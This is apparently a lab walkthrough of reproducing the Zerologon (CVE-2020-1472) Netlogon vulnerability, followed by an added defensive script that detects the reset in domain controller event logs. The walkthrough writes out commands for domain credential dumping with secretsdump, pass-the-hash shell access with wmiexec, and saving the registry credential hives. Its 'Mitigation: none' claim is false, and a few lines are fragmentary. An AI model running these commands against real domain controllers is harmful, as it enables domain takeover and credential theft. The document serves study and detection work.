
CVE-2020-1472 reproduction walkthrough


This Wind


Vulnerability overview

An elevation-of-privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploits the vulnerability can run a specially crafted application on a device on the network.
To exploit the vulnerability, an unauthenticated attacker would need to use MS-NRPC to connect to a domain controller and obtain domain administrator access.


Affected versions

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

Mitigation: none

Reproduction steps

Test environment: Windows Server 2008 and Windows Server 2012
Test result: failed on Windows Server 2012 (the referenced article's author succeeded on Windows Server 2012 SP2)

DC IP: 192.168.1.111 (for some reason I changed the IP later on, to 192.168.1.107)
Domain: demo.com

Using the exploit from the published address: https://github.com/SecuraBV/CVE-2020-1472

python zerologon_tester.py <dcname> <dcip>
python zerologon_tester.py testing 192.168.1.111


Use secretsdump.py with an empty hash or -no-pass to perform a DCSync dump (-no-pass did not work for me here; I am not sure whether it is a problem with this exp or something else)

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d42e7df83d64ed8c8e5630ce63cdeee0 'demo.com/TESTING$'@192.168.1.107


Then use wmiexec to connect to the DC

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5f7fc88c760df9ce3d74657a5943e42e demo.com/administrator@192.168.1.107


Save the SAM, SYSTEM and SECURITY hives and download them to the local machine

reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive


Parse the SAM with secretsdump (the MACHINE.ACC hash here is the original machine account's hash)

python3 secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL


Then use the restorepassword.py provided with the PoC to restore the hash (this needs a newer version of impacket; it did not succeed for me, so I am borrowing the screenshots from the referenced article)

python3 reinstall_original_pw.py testing 192.168.1.107 52bc2ea24e84d8faf163364510dd3b07b36c9c85a5846614328ccd3ff83e5ff825e3e0ae11759f1393ba10b572a480ee78272a341a2abb8b4ef65f1b754045d577543d70eac45b471d688e91dc4306a5bf0021d4d0dedaabdc866aeb260232fe85bc2319a47665e6a7cf10751e16a064ef79486d6fc86abeac64d86f5c91d8b5ba787194c082c16da99bbeca73ab323de5cc8a86ddd25d8f5e842c4ab8d4f8b304d920e9d2b3ffe43ff955173eb2451c915b712115d791560eb532cc4b30d093497a96b2941d2fbc8bc9a00fafb0a1b9b6bf466171937ee1f5e8c93fd17392ac897491b708ee934583c89d65ef6a97d1
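The steps above leave traces on the domain controller that a defender can look for. The script below is an added example written for this post, not code from the original post or from any of the tools it references: it reads a constructed CSV export of domain controller events (the sample rows are made up here, they are not logs from the post's lab) and flags the two indicators a Zerologon-style reset leaves behind: a Security event 4742 (computer account changed) whose Subject is ANONYMOUS LOGON, and, on domain controllers that have the August 2020 Netlogon update installed, the NETLOGON events 5827 to 5829 in the System log. The column layout and the message wording are assumptions about what a log forwarder would emit; the event IDs themselves are Microsoft's.

```python
"""Post-hoc indicators of a Zerologon (CVE-2020-1472) machine-account reset in
exported domain controller event logs (added example, not from the original post)."""
import csv
import io
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample export: NOT real logs from the post's lab. The layout
# mimics a flat CSV a log forwarder might produce from the DC's Security and
# System channels; "TESTING$" is the machine account name used in the post.
SAMPLE_EVENTS = """\
TimeCreated,Channel,Provider,EventID,SubjectUserName,TargetUserName,Message
2020-09-14T10:01:02,Security,Microsoft-Windows-Security-Auditing,4742,WS01$,WS01$,A computer account was changed. Password Last Set: 9/14/2020 10:01:02 AM
2020-09-14T10:05:10,Security,Microsoft-Windows-Security-Auditing,4624,-,ANONYMOUS LOGON,An account was successfully logged on. Logon Type: 3
2020-09-14T10:07:44,Security,Microsoft-Windows-Security-Auditing,4742,ANONYMOUS LOGON,TESTING$,A computer account was changed. Password Last Set: 9/14/2020 10:07:44 AM
2020-09-14T10:07:45,System,NETLOGON,5829,-,-,The Netlogon service allowed a vulnerable Netlogon secure channel connection. Machine SamAccountName: TESTING$
2020-09-14T10:09:00,Security,Microsoft-Windows-Security-Auditing,4742,Administrator,WS02$,A computer account was changed. Password Last Set: -
"""

# Netlogon event IDs introduced by Microsoft's August 2020 Netlogon update
# (System log, provider NETLOGON). 5829 is the one that matters after the
# fact: the DC accepted a secure channel that enforcement mode would refuse.
NETLOGON_EVENTS = {
    5827: "vulnerable Netlogon secure channel connection denied (machine account)",
    5828: "vulnerable Netlogon secure channel connection denied (trust account)",
    5829: "vulnerable Netlogon secure channel connection ALLOWED",
}

_MACHINE_RE = re.compile(r"Machine SamAccountName:\s*(\S+)")


@dataclass(frozen=True)
class Finding:
    time: str
    event_id: int
    account: str
    reason: str


def machine_from_message(message: str) -> Optional[str]:
    """Pull the machine account name out of a Netlogon 582x message text."""
    match = _MACHINE_RE.search(message)
    return match.group(1) if match else None


def analyze_events(csv_text: str) -> List[Finding]:
    """Flag the two indicators a Zerologon reset leaves on a DC.

    1. Security 4742 whose Subject is ANONYMOUS LOGON and whose 'Password Last
       Set' actually changed ("-" means the attribute was untouched): the
       machine account password was reset over Netlogon with no authenticated
       caller. A normal rotation is logged with the computer itself as Subject.
    2. System NETLOGON 5827/5828/5829 on a patched DC; 5829 means the
       vulnerable handshake was still accepted.
    """
    findings: List[Finding] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        event_id = int(row["EventID"])
        subject = row["SubjectUserName"].strip()
        target = row["TargetUserName"].strip()
        message = row["Message"]
        if (event_id == 4742
                and subject.upper() == "ANONYMOUS LOGON"
                and target.endswith("$")
                and "Password Last Set: -" not in message):
            findings.append(Finding(
                row["TimeCreated"], event_id, target,
                "computer account password reset by an unauthenticated caller "
                "(ANONYMOUS LOGON): matches the Zerologon reset"))
        elif event_id in NETLOGON_EVENTS and row["Provider"].upper() == "NETLOGON":
            account = machine_from_message(message) or target
            findings.append(Finding(row["TimeCreated"], event_id, account,
                                    NETLOGON_EVENTS[event_id]))
    return findings


def accounts_to_investigate(findings: List[Finding]) -> Set[str]:
    """Machine accounts that were reset (4742) or reached the DC over a
    vulnerable channel (5829); each needs a coordinated password reset or
    re-join from a trusted host, not just the DC patch."""
    return {f.account for f in findings if f.event_id in (4742, 5829)}


if __name__ == "__main__":
    found = analyze_events(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.time}  EventID {f.event_id}  {f.account}: {f.reason}")
    print("machine accounts to investigate:", sorted(accounts_to_investigate(found)))
```

On the sample data the script flags only TESTING$ (the 4742 with ANONYMOUS LOGON as Subject and the 5829 that follows it) and ignores the routine 4742 by WS01$, the plain anonymous 4624, and the 4742 whose password field is "-". Because the reset replaces the machine account password held in AD with one the host itself does not know (which is why the post ends with a restore step), every account the script lists needs its secure channel re-established, not only the DC patched.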

Reference link:
https://mp.weixin.qq.com/s?__biz=MzI2ODQwNTkxNw==&mid=2247483702&idx=1&sn=263cb1377e79f3d6e11b57b96f5e3755
